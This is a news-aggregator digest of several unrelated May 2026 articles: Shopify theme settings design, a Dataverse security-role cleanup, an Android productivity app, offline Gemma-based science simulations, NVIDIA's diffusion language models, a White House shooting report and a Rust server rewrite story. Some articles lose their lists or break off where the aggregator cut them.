The article explains that Shopify themes use a `config/settings_schema.json` file to control which design elements, such as button colors, fonts, and border thickness, merchants can edit in the theme editor without needing to code. These settings are accessed in Liquid templates via a global variable and are often compiled into CSS custom properties for consistent styling across the theme. The key is to expose meaningful, non-technical controls that allow merchants to experiment safely without breaking the theme.

A merchant wants to experiment with design elements in the theme editor - button colors, font choices, border thickness, opacity. They're not comfortable editing Liquid code; they want to click, preview, save. The question for the developer: how do you expose the right knobs to the theme editor without giving merchants a way to break the theme?
Shopify themes have a specific file that controls which settings merchants see in the theme editor: config/settings_schema.json.
This schema defines:
A well-designed settings schema gives merchants meaningful control without overwhelming them with technical knobs.
config/settings_schema.json defines what the merchant sees:
config/settings_data.json holds the merchant's saved values. This file isn't edited by developers directly - it's updated every time the merchant saves settings in the theme editor.
Liquid templates consume the settings via settings.color_button_primary, settings.font_heading, etc.
The file that controls merchant-editable design is config/settings_schema.json. Adding a new setting there makes it appear in the theme editor's global settings. Merchants click, preview, save; the change propagates across every section that references the setting.
This is distinct from:
Shopify's settings schema supports many types. For design tokens, the useful ones:
For the scenario at the top - button colors, fonts, border thickness, opacity - the right setting types are color, font_picker, and range respectively.
In Liquid, settings are accessed via the global settings variable:
For bulk CSS styling, many themes compile settings into CSS custom properties in the layout:
Then component CSS uses the custom properties:
This separation means design-system changes in the theme editor propagate everywhere in one place.
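The settings-to-custom-properties step is normally written in Liquid inside the layout. Purely as an illustration of the mapping, here is the same idea sketched in Python: `color_button_primary` is the setting id mentioned earlier, while `border_thickness` and both values are hypothetical, and the naming rule (underscores become hyphens) is an assumption rather than a Shopify convention.

```python
def to_css_custom_properties(settings: dict) -> str:
    """Render settings as a :root block of CSS custom properties."""
    lines = [
        f"  --{key.replace('_', '-')}: {value};"  # color_button_primary -> --color-button-primary
        for key, value in settings.items()
    ]
    return ":root {\n" + "\n".join(lines) + "\n}"

settings = {"color_button_primary": "#1a73e8", "border_thickness": "2px"}
css = to_css_custom_properties(settings)
```

Component CSS then only ever references the custom property names, so a value saved in the theme editor reaches every component without touching the component styles.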
Modern Shopify themes support color schemes - named combinations of background, text, button, and accent colors that apply to sections. A merchant can define "Light scheme" and "Dark scheme" and apply either to any section.
Color schemes live in the schema too but have their own structure:
This is the pattern Dawn and modern OS 2.0 themes use. Merchants pick a scheme per section; the theme renders with the scheme's colors consistently.
For fonts, the font_picker setting type returns a font object with a family name and loading URL. Themes pass that object to the font_face filter to load the font (the font_url filter returns only the file URL):
This emits the proper @font-face declaration for the chosen font. Merchants can pick any of Shopify's library fonts (Google Fonts + system) and the theme adapts automatically.
A well-organized settings schema:
A schema with 100 ungrouped settings is unusable even by technical merchants. A schema with 15 well-organized settings lets non-technical merchants confidently experiment.
Not every theme value belongs in the settings schema. Good candidates:
Bad candidates:
The boundary: if a wrong value breaks the theme meaningfully, it doesn't belong in merchant-editable settings.
A theme that supports non-technical merchant self-service has:
Merchants who can self-serve design tokens stay happier with their theme. The developer's work is making the right set of knobs available without offering footguns.

---
## Dataverse security restructure: lessons applied too late

> Published: 2026-05-24 05:19:44+00:00
> Source: https://dev.to/sapotacorp/dataverse-security-restructure-lessons-applied-too-late-12o2
> wpnews: https://wpnews.pro/news/dataverse-security-restructure-lessons-applied-too-late

The article describes a common failure pattern in Dataverse security models, where roles, business units (BUs), and teams proliferate without clear purpose, leading to a complex and unmanageable system. It recommends a restructuring process that involves inventorying existing roles, grouping them into a few canonical "capability roles," flattening the BU tree to the root unless compliance requires separation, and using teams only for record ownership. The author emphasizes that maintaining a clean model requires locking new role creation and conducting a quarterly 45-minute review to prevent drift.

Dataverse gives you three access-control primitives that combine into a permission model: business units (BUs), security roles, and teams. On paper they are simple. In practice, every project that runs for more than a year develops the same failure mode: the security model grows by accretion - a new role for every department, a new team for every project, a new business unit every time someone says "but we need regional data separation." By year three, the model has twenty roles nobody remembers the purpose of, and access audits take a week.
We have walked three projects through a security restructure. The first took five weeks because we waited too long. The last took a week because we caught it at month three. Here is the pattern.
Business unit: the hierarchical container for users and records. A row in Dataverse is owned by a user or team, which sits in a BU. BUs form a tree from the root down.
Security role: a set of privileges per table (Create / Read / Write / Delete / Append / Append To / Assign / Share) and per scope (User / Business Unit / Parent:Child / Organization). Users get one or more roles.
Team: a group of users that can own records collectively and can have roles assigned to the team (all members inherit).
The common misreading is thinking of roles as job titles ("Sales Rep") and BUs as departments ("Sales"). The native mapping is actually:
When you try to use roles for data isolation ("a Europe Sales Rep role vs a US Sales Rep role") instead of BUs, you end up with N copies of the same role for each N regions. When you try to use BUs for capability ("a Read-Only BU") you get nonsense trees.
A project's security model has drifted when we see:
We inherited all five symptoms at a client last year, and the fix below is what we ran.
Inventory what exists. Export the security role matrix to a spreadsheet. Every role, every table, every privilege. This single document is the starting point of every conversation.
Group roles by intent. Look at the column of privileges per role and find clusters. Most "custom roles" actually map to 3-5 intents: Read-Only, Standard User, Power User, Admin, System Admin. Anything more granular is almost always a slight variation.
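A first pass at this grouping can be automated once the matrix is exported. The sketch below assumes the export has been loaded into a dictionary mapping each role name to a set of (table, privilege, scope) grants. That structure, the function name, and the sample roles are hypothetical and not a Dataverse API.

```python
from collections import defaultdict


def group_roles_by_privileges(role_matrix):
    """Group role names whose (table, privilege, scope) grants are identical."""
    clusters = defaultdict(list)
    for role, grants in role_matrix.items():
        clusters[frozenset(grants)].append(role)
    # Sort for stable, reviewable output.
    return sorted(sorted(names) for names in clusters.values())


# Hypothetical export: two regional copies of one role plus an auditor role.
role_matrix = {
    "EU Sales Rep": {("account", "Read", "Business Unit"), ("account", "Write", "User")},
    "US Sales Rep": {("account", "Read", "Business Unit"), ("account", "Write", "User")},
    "Auditor": {("account", "Read", "Organization")},
}
groups = group_roles_by_privileges(role_matrix)
```

Exact matching only catches true duplicates. Roles that differ by one or two privileges still need a manual look, or a similarity measure over the grant sets.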
Define capability roles. Replace the cluster from step 2 with 3-5 canonical roles:
Identify real data isolation requirements. Most projects need ZERO BUs beyond the root. Ask concretely: "If a user sees a record they should not, does the business have an audit or compliance problem?" For most internal CRMs, the answer is no. For multi-country businesses with data residency rules, the answer is yes and you need one BU per country.
Collapse the BU tree. If you have seven BUs and zero of them have a compliance rationale, move all users to the root BU and delete the others. This is the biggest unlock - most "BU-scoped access" issues disappear when the tree flattens.
Use teams for ownership, not assignment. A team should own records that multiple users share responsibility for (a deal desk queue, a support triage pool). Do not create teams to hold users who share a role - that is what the role is for.
Migrate users to the new role set. Assign the new canonical roles; remove the old custom roles one by one and verify nothing breaks. Do this in a UAT mirror first, not in Prod.
Lock further role creation. New security roles require an explicit ticket and justification. "We need a new role for X" usually maps to "we need to add a capability to an existing role." Making the default answer "no" keeps the model clean for the long run.
Even a clean model drifts. Every quarter:
45 minutes per quarter, one engineer. The output is either "no changes" or a ticket to consolidate a role. Either outcome is healthy.
Changing a security role that is actively assigned to users does not always propagate immediately. Role changes take effect on the next user action or after a cache refresh, which can be up to fifteen minutes.
If you remove a privilege from a role expecting the change to apply now, and a user who has that role does something in the window between your change and their cache refresh, the old privilege is still in effect.
For non-urgent changes: ignore it, the cache will clear. For security-critical revocations (compromised account, departing employee): disable the user account, not the role. Account disable is immediate; role changes are eventually consistent.
If your project is six months in and you already see four custom roles with overlapping purpose: stop adding, don't restructure yet. Let the scope settle for another month, note every "new role" ticket that comes in without approving it, then run the eight-step restructure at month three. One week of focused work saves four weeks later.
If your project is two years in and unmaintainable: block out a dedicated two-week window, do the full restructure, treat it as a one-time debt payment, and then install the quarterly review. The pain does not go away on its own.

---
## Floatkit is live now!!!

> Published: 2026-05-24 05:19:26+00:00
> Source: https://dev.to/fari_ji/floatkit-is-live-now-4283
> wpnews: https://wpnews.pro/news/floatkit-is-live-now

The article announces the launch of Floatkit, a floating productivity panel for Android developed by Fari Ji. Built with Kotlin, the tool is designed to enhance user productivity by providing quick access to features directly from an overlay on the screen.

A Floating Productivity Panel I Built for Android

Fari Ji · May 23 · 2 min read

#showdev #android #kotlin #productivity

---
## SimGemma: Democratizing STEM Education with Offline-First AI Simulations

> Published: 2026-05-24 05:18:38+00:00
> Source: https://dev.to/damodharanj/simgemma-democratizing-stem-education-with-offline-first-ai-simulations-4409
> wpnews: https://wpnews.pro/news/simgemma-democratizing-stem-education-with-offline-first-ai-simulations

SimGemma is an offline-first, AI-powered platform built by tech lead and volunteer teacher Damodharan to generate interactive 3D science simulations using natural language. Designed for the Google Gemma Challenge, it uses the Gemma 4 model to allow educators in resource-constrained or disconnected classrooms to create physics and chemistry visualizations on demand. The platform also leverages Gemma 4’s translation capabilities to make these simulations accessible in regional languages like Tamil, aiming to bridge equity gaps in STEM education.

Imagine a classroom in a remote village. There’s a blackboard, a few passionate teachers, and curious students. What’s missing? A high-end physics lab. Even more challenging? A stable internet connection.
Physics is a subject that demands exploration. It’s hard to grasp the beauty of gravity or the silence of a vacuum from a two-dimensional drawing. This is why I built SimGemma—an offline-first, AI-powered platform designed to bring high-fidelity 3D science simulations to every classroom, regardless of connectivity.
I'm Damodharan, a Tech Lead who spends weekends teaching math and science to kids through an NGO. I've always felt that teaching topics like pendulum motion or trigonometry on a blackboard didn't do justice to the science. These concepts, along with things like molecular structures (methane, for instance), are simply better understood in 3D.
SimGemma was created for the Google Gemma Challenge to demonstrate how open-weights models like Gemma can solve real-world problems in resource-constrained environments.
Traditional STEM education often suffers from two major hurdles:
I used to hand-code these simulations in Three.js, but it was time-consuming and hard to scale. I needed a way to generate these artifacts on demand.
SimGemma is a "Lab in a Box." It allows educators to generate interactive 3D simulations using simple natural language.
The heart of SimGemma is the Gemma 4 model. We chose Gemma for its exceptional performance-to-size ratio, making it perfect for local deployment.
We implemented a two-tier offline approach:
One of the most exciting aspects of SimGemma is what we call "Vibecoding." In our NGO workshops, we’ve seen that the biggest barrier to using technology in the classroom isn't lack of interest—it's the complexity of the tools.
With Gemma 4, we’ve turned the creation process into a conversation. A teacher can say: "Show me a double pendulum where the second arm is twice as heavy, and let's see it in Mars' gravity."
Gemma understands the physics constraints, generates the necessary React/Three.js code, and renders it instantly. It turns educators into creators.
Living in India, where we have 22 official languages, I’ve seen how language can be a barrier to quality STEM content. Gemma 4’s translation capabilities are a game-changer. SimGemma can generate and translate these artifacts into regional languages like Tamil instantly. This means a teacher can create a simulation in English and have it ready for a Tamil-medium classroom in seconds, ensuring no student is left behind because of a language gap.
As a STEM volunteer, I’ve seen firsthand how an interactive simulation can light up a student's eyes. SimGemma isn't just about code; it's about equity. It ensures that a child in a rural NGO workshop has access to the same quality of scientific exploration as a student in a tech-hub city.
SimGemma proves that "Offline AI" isn't a compromise—it's a superpower. By leveraging the open-weights of Gemma 4, we’ve built a tool that is resilient, private, and accessible.
We are currently looking into:
#Gemma #AI #OpenSource #Education #STEM #Physics #Remotion #ThreeJS

---
## Diffusion Language Models Are Here: Deep Dive into NVIDIA's Nemotron-Labs DLM Architecture

> Published: 2026-05-24 05:13:07+00:00
> Source: https://dev.to/monuminu/diffusion-language-models-are-here-deep-dive-into-nvidias-nemotron-labs-dlm-architecture-2ke2
> wpnews: https://wpnews.pro/news/diffusion-language-models-are-here-deep-dive-into-nvidia-s-nemotron-labs-dlm

NVIDIA has open-sourced the Nemotron-Labs Diffusion family of language models (3B, 8B, and 14B parameters), which replace traditional left-to-right autoregressive generation with a parallel denoising diffusion process. This architectural shift allows the models to refine all tokens in a block simultaneously, achieving up to 6.4× faster inference by overcoming the memory-bandwidth bottleneck that limits standard LLMs. The models address previous accuracy gaps in diffusion language models, making them competitive with autoregressive counterparts on standard benchmarks.

Meta Description: NVIDIA just open-sourced Nemotron-Labs Diffusion, a family of 3B, 8B, and 14B diffusion language models that merge autoregressive and diffusion generation for up to 6.4× faster inference. Here's the complete technical deep dive into the architecture, training methodology, three generation modes, and how to run it today with SGLang.

## Table of Contents

1. [The Speed Wall Autoregressive LLMs Hit](#1-the-speed-wall-autoregressive-llms-hit)
2. [What Are Diffusion Language Models?](#2-what-are-diffusion-language-models)
3. [Why DLMs Struggled — Until Now](#3-why-dlms-struggled--until-now)
4. [NVIDIA's AR-to-DLM Breakthrough: Efficient-DLM](#4-nvidias-ar-to-dlm-breakthrough-efficient-dlm)
5. [Nemotron-Labs Diffusion: The Model Family](#5-nemotron-labs-diffusion-the-model-family)
6. [Three Generation Modes: AR, Diffusion, Self-Speculation](#6-three-generation-modes-ar-diffusion-self-speculation)
7. [Performance Deep Dive: The Numbers That Matter](#7-performance-deep-dive-the-numbers-that-matter)
8. [Under the Hood: Block-Wise Attention & KV Caching](#8-under-the-hood-block-wise-attention--kv-caching)
9. [Getting Started: Running with SGLang](#9-getting-started-running-with-sglang)
10. [What This Means for Production LLM Infrastructure](#10-what-this-means-for-production-llm-infrastructure)
11. [Conclusion & The Road Ahead](#11-conclusion--the-road-ahead)

## 1. The Speed Wall Autoregressive LLMs Hit

Every language model you've ever used — GPT-4, Claude, Llama, Qwen — generates text the same fundamental way: one token at a time, left to right, each new token conditioned on every previous one. It's called **autoregressive (AR) generation**, and it's been the undisputed king of language modeling since the original GPT paper in 2018.

But AR generation has a dirty secret. It's not a compute-bound problem. It's a **memory-bandwidth-bound** problem.

Here's why that matters: each new token requires a full model forward pass. That means loading all the model's weights (roughly 14 GB for a 7B model in FP16) from HBM (High Bandwidth Memory) into the GPU's compute cores on every single decoding step. On modern GPUs, the arithmetic throughput is enormous, but the memory bandwidth is the bottleneck. This is why serving an LLM at batch size 1, a single user chatting with your model, leaves your GPU vastly underutilized.

The math is brutal. An A100 80GB GPU has ~2TB/s of HBM bandwidth. A 7B-parameter model in FP16 takes ~14GB. Reading all weights takes ~7ms minimum per step. At 30 tokens/second, you're spending the vast majority of each step just *moving weights*, not computing. Scale this to a production API endpoint handling thousands of concurrent users, and the economics become painful.
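The arithmetic behind those figures can be checked in a few lines. This is a back-of-the-envelope sketch using the numbers quoted above (7B parameters, 2 bytes per FP16 weight, ~2 TB/s of bandwidth). The function name is illustrative, and the estimate ignores KV-cache and activation traffic, so it is a lower bound on step time rather than a measurement.

```python
def weight_read_ms(params_billion, bytes_per_param, bandwidth_tb_per_s):
    """Minimum time in milliseconds to stream every weight from HBM once."""
    weight_bytes = params_billion * 1e9 * bytes_per_param
    return weight_bytes / (bandwidth_tb_per_s * 1e12) * 1e3


# Figures quoted in the text: 7B parameters, FP16, ~2 TB/s.
step_ms = weight_read_ms(7, 2, 2.0)

# If every decoding step must read all weights, this bounds single-stream speed.
ceiling_tokens_per_s = 1000.0 / step_ms
```

Under these assumptions the weight read alone costs about 7 ms per step, which puts a ceiling of roughly 140 tokens per second on a single stream regardless of how much arithmetic throughput the GPU has.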

The community has attacked this problem from many angles: **speculative decoding** (using a small draft model to propose tokens verified by the large model), **quantization** (FP8, INT4 to shrink weight footprint), and **FlashAttention** (an IO-aware attention kernel that avoids materializing the full attention matrix in HBM). These are all incremental improvements on the same fundamental loop.

NVIDIA's Nemotron-Labs Diffusion — released on HuggingFace on May 23, 2026 — is taking a fundamentally different approach. Instead of optimizing the autoregressive loop, it **breaks the loop entirely**.

## 2. What Are Diffusion Language Models?

If you've worked with image generation models (Stable Diffusion, DALL·E, Flux), you already know the concept of denoising diffusion. The idea is to start with pure noise and iteratively denoise it, guided by a conditioning signal, until you arrive at a coherent output.

**Diffusion Language Models (DLMs)** apply this same paradigm to text. Instead of generating tokens left-to-right, a DLM:

- Starts with a sequence of **masked or noisy tokens** (analogous to Gaussian noise in image diffusion)
- Runs multiple **denoising refinement steps**, predicting the clean token distribution at each step
- After several iterations, the entire sequence, or a large block of it, **converges to the final output**

The key theoretical advantage is parallelism. In a standard AR model, token *t* can only be generated after token *t-1* exists. In a DLM, all positions in a block are refined **simultaneously** in each forward pass. This changes the computational profile dramatically: instead of being memory-bandwidth-bound by sequential weight loads, the GPU can be kept busy with dense matrix multiplications across the full block.

The conceptual roots of DLMs trace back to **Masked Diffusion Language Models** (MDLMs) — work like MDLM (Sahoo et al., 2024) and SEDD (Lou et al., 2023) — that framed text generation as a discrete denoising process over masked token sequences. However, these models had significant practical shortcomings when compared to the state-of-the-art AR models of the day. NVIDIA's work specifically addresses why, and more importantly, how to fix it.

## 3. Why DLMs Struggled — Until Now

The community has known about the theoretical appeal of diffusion language models for years. The reason they haven't taken over is a cluster of practical barriers that made them non-competitive with AR models in production:

**1. Accuracy Gap:** DLMs trained from scratch consistently underperformed comparably-sized AR models on standard benchmarks. The discrete, iterative denoising process is harder to optimize than the clean causal language modeling objective. Models like Dream 7B were impressive for DLMs, but still lagged behind Qwen3 4B — a smaller AR model — on reasoning and knowledge tasks.

**2. Training Instability:** Jointly learning to denoise across many noise levels with a bidirectional attention mask creates a different gradient landscape than causal language modeling. Loss curves are noisier, and the model is more sensitive to hyperparameter choices.

**3. No KV Cache Compatibility:** This was the killer for inference efficiency. KV caching — where you store key/value activations from previous tokens to avoid recomputing them — is the single most important optimization for AR inference. Standard DLMs use fully bidirectional attention across the entire sequence, which means you *can't* cache anything: every refinement step needs to attend over all positions with the updated token states. This essentially erased the theoretical throughput advantage.

**4. Fill-in-the-Middle Mismatch:** During DLM training, tokens are masked uniformly at random across the sequence. But at inference time, the model typically has a left-side prefix (the prompt) that is fully unmasked, and must fill in the right side. This creates a *training-test distribution mismatch* that degrades quality.

Each of these problems has a specific technical solution in NVIDIA's Efficient-DLM framework. Let's dig in.

## 4. NVIDIA's AR-to-DLM Breakthrough: Efficient-DLM

The foundational insight behind Nemotron-Labs Diffusion (and the academic paper it builds on, [arXiv:2512.14067](https://arxiv.org/abs/2512.14067)) is deceptively simple: **don't train DLMs from scratch — convert pretrained AR models into DLMs**.

This avoids the accuracy gap problem entirely. You start with a model that already has world-class knowledge and reasoning capabilities baked into its weights, then teach it to *also* generate diffusion-style. The result is a model that retains AR accuracy while gaining diffusion parallelism.

But there are two critical technical challenges to solve for this conversion to work.

### 4.1 Block-Wise Attention: Preserving Weights, Enabling KV Caching

The attention mechanism is the crux of the problem. A standard AR model uses **causal (lower-triangular) attention** — each token attends only to itself and all previous tokens. A standard DLM uses **bidirectional (full) attention** — every token attends to every other token.

The issue: if you convert an AR model and suddenly change to fully bidirectional attention, you've broken the statistical assumptions baked into all those attention weights during pretraining. The key-value projections were trained to operate in a causal setting; they "expect" not to see future tokens. Loading them into a fully bidirectional context produces degraded output and requires extensive retraining to recover.

Efficient-DLM introduces **block-wise causal attention** as the solution:

- The sequence is divided into non-overlapping blocks of size *B* (e.g., 32 tokens)
- **Within each block**: full bidirectional attention (every token attends to every other token in the block)
- **Across blocks**: standard left-to-right causal attention (block *i* can attend to blocks 0 through *i-1*)

This hybrid pattern does something clever: it's structurally similar enough to causal attention that pretrained weight distributions are preserved — the model only needs to learn bidirectionality *locally* within blocks, not globally across the whole sequence. The result is a much smoother conversion that requires far less compute to recover quality.
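The attention pattern described above reduces to a simple rule on block indices: a query may attend to a key when the key's block is not later than the query's block. The sketch below builds that boolean mask with plain Python lists. The function name and the toy sizes are illustrative, and a real implementation would build the mask as a tensor inside the attention kernel.

```python
def block_causal_mask(seq_len, block_size):
    """mask[q][k] is True when query position q may attend to key position k."""
    return [
        [(k // block_size) <= (q // block_size) for k in range(seq_len)]
        for q in range(seq_len)
    ]


# Toy example: 6 positions in blocks of 2, giving blocks {0,1}, {2,3}, {4,5}.
mask = block_causal_mask(seq_len=6, block_size=2)
```

With block_size=1 the rule collapses to ordinary causal attention, and with block_size equal to the sequence length it becomes fully bidirectional. That is one way to see why the block-wise form sits between the two regimes.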

Crucially, this also re-enables **KV caching**. Since attention is still causal *across* blocks, the KV activations of completed (committed) blocks can be cached and reused exactly like in a standard AR model. Only the *current* block being refined needs to be recomputed each refinement step.

### 4.2 Position-Dependent Token Masking

The second innovation addresses the training-test distribution mismatch. Instead of masking tokens uniformly at random during training, Efficient-DLM uses a **position-dependent masking strategy** that assigns *higher* masking probabilities to tokens in *later* positions in the sequence.

The intuition: at inference time, when filling in a response to a prompt, earlier tokens in the response have already been decided (or are more constrained by the left-side context), while later tokens remain more uncertain. By skewing the training mask distribution to match this pattern, the model learns a denoising objective that better mirrors what it actually faces at test time.
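To make the idea concrete, here is a minimal sketch of a position-dependent mask sampler. The source does not state the actual schedule, so the linear ramp and the low/high probabilities below are assumptions chosen purely for illustration. The only property taken from the text is that later positions are masked more often.

```python
import random


def mask_probability(position, length, low=0.2, high=0.9):
    """Assumed linear ramp: masking probability rises from `low` to `high`."""
    if length <= 1:
        return high
    return low + (high - low) * position / (length - 1)


def sample_mask(length, rng, low=0.2, high=0.9):
    """Draw one boolean mask; True means the token at that position is masked."""
    return [rng.random() < mask_probability(i, length, low, high)
            for i in range(length)]


probs = [mask_probability(i, 5) for i in range(5)]
mask = sample_mask(5, random.Random(0))
```

Uniform masking would correspond to setting low equal to high. The skew toward later positions is what brings the training masks closer to the prefix-then-fill pattern seen at inference.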

### 4.3 Joint AR + Diffusion Training Objective

Rather than optimizing purely for the diffusion objective, Nemotron-Labs Diffusion is trained with a **joint AR and diffusion loss**:

```
L_total = λ · L_AR + (1 - λ) · L_diffusion
```

Where `L_AR` is the standard cross-entropy causal language modeling loss and `L_diffusion` is the masked diffusion objective. This joint training ensures the model remains a first-class AR model while learning the diffusion generation capability.
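The weighting in that formula can be sketched with toy numbers. The code below treats both terms as a mean negative log-likelihood over the probabilities the model assigns to the target tokens. That is a simplification: the real masked diffusion objective may carry extra per-step weighting that the source does not describe. The value of λ and all function names are assumptions.

```python
import math


def cross_entropy(target_probs):
    """Mean negative log-likelihood of the probabilities given to the targets."""
    return -sum(math.log(p) for p in target_probs) / len(target_probs)


def joint_loss(ar_target_probs, diffusion_target_probs, lam):
    """L_total = lam * L_AR + (1 - lam) * L_diffusion."""
    l_ar = cross_entropy(ar_target_probs)
    # Simplification: diffusion term computed over masked positions only.
    l_diffusion = cross_entropy(diffusion_target_probs)
    return lam * l_ar + (1.0 - lam) * l_diffusion


# Toy probabilities; lam=0.5 weights both objectives equally.
loss = joint_loss([0.5, 0.5], [0.25], lam=0.5)
```

Setting lam to 1 recovers pure causal language modeling and setting it to 0 recovers pure diffusion training, so the parameter controls how much of the original AR behavior the converted model is asked to keep.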

The pretrained base was trained on **1.3 trillion tokens** from NVIDIA's Nemotron pretraining datasets, with an additional **45 billion tokens** of supervised fine-tuning data for the instruct-tuned variants.

## 5. Nemotron-Labs Diffusion: The Model Family

NVIDIA released seven model checkpoints on HuggingFace under the NVIDIA Nemotron Open Model License (commercially friendly for text models):

| Model | Parameters | Type | Downloads (Day 1) |
|---|---|---|---|
| `nvidia/Nemotron-Labs-Diffusion-3B` | ~4B | Text, Instruct | 14.7K |
| `nvidia/Nemotron-Labs-Diffusion-3B-Base` | ~4B | Text, Base | 14.2K |
| `nvidia/Nemotron-Labs-Diffusion-8B` | 8B | Text, Instruct | 24.1K |
| `nvidia/Nemotron-Labs-Diffusion-8B-Base` | 8B | Text, Base | 228K |
| `nvidia/Nemotron-Labs-Diffusion-14B` | 14B | Text, Instruct | 3.28K |
| `nvidia/Nemotron-Labs-Diffusion-14B-Base` | 14B | Text, Base | 1.18K |
| `nvidia/Nemotron-Labs-Diffusion-VLM-8B` | ~9B | Vision-Language | 590 |

The **8B Base model** being the most downloaded (228K in under 2 days) reflects developer interest in using it as a foundation for custom fine-tuning.

## 6. Three Generation Modes: AR, Diffusion, Self-Speculation

The standout design decision in Nemotron-Labs Diffusion is that **all three generation modes are supported from a single checkpoint**. You don't need different models — just a different deployment config in SGLang.

### Mode 1: Autoregressive (`ar_mode=true`)

Standard left-to-right token generation, identical to how you'd run any other causal LM. This mode is the **correctness baseline** — most 

---
## White House shooting marks another incident in a string of political violence

> Published: 2026-05-24 05:09:36+00:00
> Source: https://www.nbcnews.com/politics/donald-trump/white-house-shooting-marks-another-incident-string-political-violence-rcna346679
> wpnews: https://wpnews.pro/news/white-house-shooting-marks-another-incident-in-a-string-of-political-violence

A 21-year-old man was fatally shot by U.S. Secret Service agents after he opened fire at a White House security checkpoint on Saturday evening, injuring a bystander. The incident is the latest in a series of politically motivated attacks near the White House and in President Donald Trump’s orbit, including a shooting at the White House Correspondents’ Association dinner last month and two prior assassination attempts against Trump in 2024. The string of violence follows a broader national rise in politically motivated attacks and threats against lawmakers, which reached nearly 15,000 cases in 2025.

The shooting at the White House Saturday evening is just the latest act of political violence carried out in President Donald Trump’s orbit in recent weeks.
It comes less than a month after a man opened fire outside the ballroom where Trump, members of his Cabinet and numerous government officials were attending the White House Correspondents’ Association dinner, an attack that highlighted a string of attempted security breaches and raised concerns around the safety of the president.
On Saturday, U.S. Secret Service agents fatally shot a 21-year-old man after he opened fire on officers at a White House security checkpoint, resulting in a bystander being injured, officials said. Officials have not given details about a possible motive.
The man, who had previously been arrested, was known to the Secret Service for walking around the White House complex and asking how to gain access, according to a court filing from a July 10 incident.
Hours after the incident, Trump said in a post on Truth Social that the shooting was another sign the White House needed a “safe and secure space,” such as the ballroom that he is seeking additional funding for.
“The National Security of our Country demands it!” Trump said.
Earlier this month, Secret Service agents shot a man near the Washington Monument, along the path of Vice President JD Vance’s motorcade, after he allegedly opened fire when authorities confronted him.
Agents pursued the man after they noticed he appeared to be concealing a firearm on the side of his body. He turned and opened fire, injuring a bystander before being shot himself, the Department of Justice said in a news release.
While in an ambulance after the shooting, the suspect allegedly made a vulgar remark about the White House, the Justice Department said.
In the White House Correspondents’ Association incident, prosecutors have said that before the suspect charged past officers at a security checkpoint, he sent his family members a note that criticized Trump, without mentioning him explicitly by name, and wrote that he intended to target administration officials.
“Let me be clear — what we are witnessing is a pattern of violence directed at the President and at members of the press simply for doing their jobs,” Rep. Adam Smith, D-Wash., said in a post on X Saturday night.
The string of shootings in proximity to the White House follows two previous assassination attempts against the president.
In July 2024, Trump was grazed by a bullet when a 20-year-old gunman fired at the president as he held a campaign rally in Butler, Pennsylvania.
In September of that year, a man came to a golf course near Mar-a-Lago with a rifle, aiming it through the bushes as Trump was there playing, officials said. Secret Service agents shot at the man, who fled in his car before being pulled over and arrested. He was later sentenced to life in prison for the attempted assassination.
It wasn’t the last time someone brought a weapon to Mar-a-Lago. In February, a man was shot and killed by a Palm Beach County deputy after he entered the secure perimeter of Trump’s Mar-a-Lago residence with “what appeared to be a shotgun and a fuel can,” the Secret Service said at the time.
The recent violence in Washington also comes as politically motivated attacks have escalated nationwide.
In April, two men allegedly brought homemade bombs to an anti-Islam protest outside of the house of Zohran Mamdani, New York City’s first Muslim mayor.
The men pleaded not guilty to the charges last month, but had told police that they were inspired by the Islamic State group, according to a federal complaint. They were recorded on their vehicle’s dashcam describing their plan to kill as many as 60 people in an attempt to “start terror,” prosecutors said.
On Capitol Hill, a January report by the United States Capitol Police found that threats against lawmakers climbed for the third year in a row, reaching nearly 15,000 cases in 2025.
Lawmakers from both sides of the aisle have spoken out against political violence amid the mounting incidents.
“Political violence and acts of extremism have absolutely no home in our country, and the continued targeting of President Trump, public officials, and innocent Americans is absolutely disgusting,” Rep. Gabe Evans, R-Colo., wrote in a post on X Saturday.
Rep. Shri Thanedar, D-Mich., wrote in his own post Saturday that “Political violence is 100% unacceptable! There is absolutely no room for that in this country.”
“We can settle our disagreements at the ballot box,” the congressman added, “Political violence is reprehensible.”

---
## I Still Remember the Day Our Server Stall Almost Killed the Product Launch

> Published: 2026-05-24 05:09:34+00:00
> Source: https://dev.to/built-from-africa/i-still-remember-the-day-our-server-stall-almost-killed-the-product-launch-44ig
> wpnews: https://wpnews.pro/news/i-still-remember-the-day-our-server-stall-almost-killed-the-product-launch

The article describes how a lead systems engineer's team faced a critical performance bottleneck weeks before launching a server for an online treasure hunt game, caused by a poorly optimized Java-based configuration layer. After profiling revealed excessive memory allocations and high latency, the team replaced the Java layer with a custom Rust solution, which reduced allocation counts by a factor of 10 and cut average response time from 500 milliseconds to 50 milliseconds. The successful rewrite allowed the server to scale cleanly and handle the expected traffic for the product launch.

I was the lead systems engineer on a project to build a highly scalable server for a popular online treasure hunt game, and we were just weeks away from launch when our performance tests started showing alarming signs of stalling at even moderate traffic levels. Our team had spent months designing the architecture, writing the code, and testing the system, but somehow we had missed a critical bottleneck. The problem was not just about handling more requests, but about the underlying configuration decisions that determined whether our server would scale cleanly or grind to a halt at the first growth inflection point. We were using a custom-built configuration layer, which we later found out was not optimized for our specific use case. The layer was built on top of a Java-based framework, which was causing significant overhead in terms of memory allocation and garbage collection.
Our initial approach was to try and optimize the existing configuration layer by tweaking the Java virtual machine settings, adjusting the heap size, and tuning the garbage collection parameters. We also tried to implement a caching mechanism to reduce the load on the configuration layer. However, despite our best efforts, the performance gains were minimal, and we were still experiencing significant stalls and latency issues. We used the VisualVM tool to profile our application and identify the performance bottlenecks. The profiler output showed that the configuration layer was responsible for a significant percentage of the memory allocations, with an average allocation count of 500,000 per second. The latency numbers were also alarming, with an average response time of 500 milliseconds. We realized that we needed to take a more radical approach to solve the problem.
After much discussion and analysis, we decided to replace the Java-based configuration layer with a custom-built solution using Rust. The decision was not taken lightly, as we knew that Rust had a steep learning curve and would require significant investment in terms of time and resources. However, we were convinced that the benefits of using Rust, including its focus on memory safety and performance, would outweigh the costs. We spent several weeks rewriting the configuration layer in Rust, using the Tokio framework for asynchronous programming and the serde framework for serialization and deserialization. We also implemented a custom caching mechanism using the Redis database to reduce the load on the configuration layer.
After deploying the new configuration layer, we ran a series of performance tests to measure the impact of the changes. The results were striking. Allocations fell by a factor of 10, from an average of 500,000 per second to 50,000 per second. Average response time improved by the same factor, from 500 milliseconds to 50 milliseconds. The profiler output showed that the configuration layer was now responsible for less than 1% of the memory allocations, with a significant reduction in garbage collection overhead. CPU usage also dropped by 20% thanks to more efficient use of system resources. The numbers showed that our decision to use Rust had paid off, and we were now confident that our server would scale cleanly and handle the expected traffic.
